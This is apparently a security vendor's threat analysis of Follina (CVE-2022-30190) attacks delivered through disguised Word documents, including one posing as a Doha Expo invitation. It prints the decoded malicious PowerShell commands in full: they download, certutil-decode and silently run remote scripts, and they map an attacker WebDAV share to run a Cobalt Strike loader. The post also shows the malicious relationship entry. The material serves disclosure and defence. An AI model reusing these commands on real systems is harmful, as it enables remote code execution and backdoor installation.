On June 7th, the ASEC analysis team swiftly uploaded a brief introduction of a zero-day vulnerability for Microsoft Office files (Follina). As the patch for the vulnerability is not distributed yet, users are advised to take caution.
AhnLab has distributed a detection rule for attack attempts exploiting the vulnerability from the perspectives of file and behavior detections. The vulnerability can be detected by various AhnLab products (V3, MDS, and EDR). While the team was monitoring such attack attempts, a distribution case targeting Korean users was found in the ASD (Ahnlab Smart Defense) infrastructure on June 7th. The log below is V3 Lite 4.0 and the attack distributed a file named ‘Antimicrobial Film Request 1-1.docx‘.
As the post mentioned above explains, the file runs a remote process using msdt.exe to exploit normal Windows programs Powershell.exe and CertUtil.exe, which are for downloading and decrypting encrypted scripts. It then uses Powershell.exe again to inject the shellcode into the currently running explorer.exe to perform malicious behaviors. The following part offers a more detailed explanation.
Opening a Word file named ‘Antimicrobial Film Request 1-1.docx‘ that is using the CVE-2022-30190 vulnerability executes a remote command as shown above.
// Part of decoded figure above "c:\windows\system32\cmd.exe"; Start-Process $cmd -windowstyle hidden -ArgumentList "/c powershell iwr -outf %tmp%\api.txt http://micronannox[.]com//b.txt & certutil -decode %tmp%\api.txt %tmp%\apis.ps1"; Start-Sleep 3; Start-Process $cmd -windowstyle hidden -ArgumentList "/c powershell Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser & powershell %tmp%\apis.ps1
The following shows a brief execution process of the code run by the vulnerability.
- Powershell.exe saves hxxp://micronannox[.]com/b.txt as %tmp%api.txt.
- api.txt is decrypted as apis.ps1 using Certutil.exe.
- The decrypted apis.ps1 is executed after being imbued with properties for being hidden and running scripts.
- apis.ps1 injects the shellcode into the currently running explorer.exe. The injected shellcode downloads additional encrypted data from hxxp://micronannox[.]com/imei.omg to the C:\Users\Public\no1.png path and decrypts it with xor.
- The file that is ultimately decrypted is an executable that additionally downloads backdoor files.
AhnLab products detect and block the Word files using the latest vulnerability with the following aliases.
V3 Behavior Detection
AhnLab EDR Detection
The detection log of the rule applied to detect files related to the vulnerability also discovered a file targeting the 2023 Doha Expo (VIP Invitation to Doha Expo 2023.docx) on June 2nd, which will be discussed below.
The file attempts to download data from the external URL connected to the internal document.xml.rels. To trick users, it uses the download URL related to the expo.
Figures 7 and 8 show how the Word file is disguised as an invitation to the Doha Expo.
The analysis team discovered two Word files while monitoring detection logs. Each file’s URL existing in the external tag of document.xml.rels within the file is the same, but the tag placement is slightly changed.
<em><?xml version="1.0" encoding="UTF-8" standalone="yes"?></em> (..omitted..) <Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="hxxps://files.attend-doha-expo[.]com/inv.html!" TargetMode="External" /> (..omitted..) </Relationships>
The HTML file has a long annotation (AAA…) in the upper part just like the PoC code that was previously revealed. However, the lower part has a Base64-encoded powershell code. The figure below shows the decoded code.
The previous blog post mentioned the possibility of various attacks as the attackers can execute codes they intend to run. As for the HTML related to the Word file disguised as ‘2023 Doha Expo Invitation,’ there is a code that can download the payload of Cobalt Strike.
$cmd="C:\windows\system32\cmd.exe"; Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe"; Start-Process $cmd -windowstyle hidden -ArgumentList "/c net use z: \\5.206.224[.]233\webdav\ /user:user `$RFVbgtyuJ32D && z:\osdupdate.exe && net use z: /delete ";
Until an official patch is released, you can apply a temporary measure by disabling the MSDT URL protocol.
AhnLab can detect the vulnerable file and its behaviors with the following aliases:
- [File Alias]
- [Behavior Alias]
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.